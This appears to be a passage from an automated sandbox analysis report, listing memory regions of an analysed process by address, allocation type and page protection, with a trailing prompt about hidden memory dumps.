trusted library allocation
|
page read and write
|
||
|
7380000
|
trusted library allocation
|
page read and write
|
||
|
4450000
|
trusted library allocation
|
page read and write
|
||
|
24C5563D000
|
heap
|
page read and write
|
||
|
26316000
|
trusted library allocation
|
page read and write
|
||
|
23040000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34660000
|
trusted library allocation
|
page execute and read and write
|
||
|
2712000
|
trusted library allocation
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
258B0000
|
trusted library allocation
|
page read and write
|
||
|
22FA0000
|
direct allocation
|
page read and write
|
||
|
7FFD348B0000
|
trusted library allocation
|
page read and write
|
||
|
24C57BF9000
|
trusted library allocation
|
page read and write
|
||
|
25750000
|
trusted library allocation
|
page read and write
|
||
|
23040000
|
trusted library allocation
|
page read and write
|
||
|
25480000
|
trusted library allocation
|
page read and write
|
||
|
255F3000
|
heap
|
page read and write
|
||
|
22F6F000
|
stack
|
page read and write
|
||
|
25480000
|
trusted library allocation
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
258B0000
|
trusted library allocation
|
page read and write
|
||
|
22820000
|
direct allocation
|
page read and write
|
||
|
5B44000
|
remote allocation
|
page execute and read and write
|
||
|
22F90000
|
direct allocation
|
page read and write
|
||
|
4491000
|
trusted library allocation
|
page read and write
|
||
|
7803000
|
heap
|
page read and write
|
||
|
23040000
|
trusted library allocation
|
page read and write
|
||
|
25A30000
|
trusted library allocation
|
page read and write
|
||
|
7330000
|
trusted library allocation
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
24C5565D000
|
heap
|
page read and write
|
||
|
7415F0B000
|
stack
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
4310000
|
trusted library allocation
|
page read and write
|
||
|
8380000
|
trusted library allocation
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
24C55590000
|
heap
|
page read and write
|
||
|
7FFD34820000
|
trusted library allocation
|
page read and write
|
||
|
24C595D7000
|
trusted library allocation
|
page read and write
|
||
|
4440000
|
heap
|
page execute and read and write
|
There are 705 hidden memdumps, click here to show them.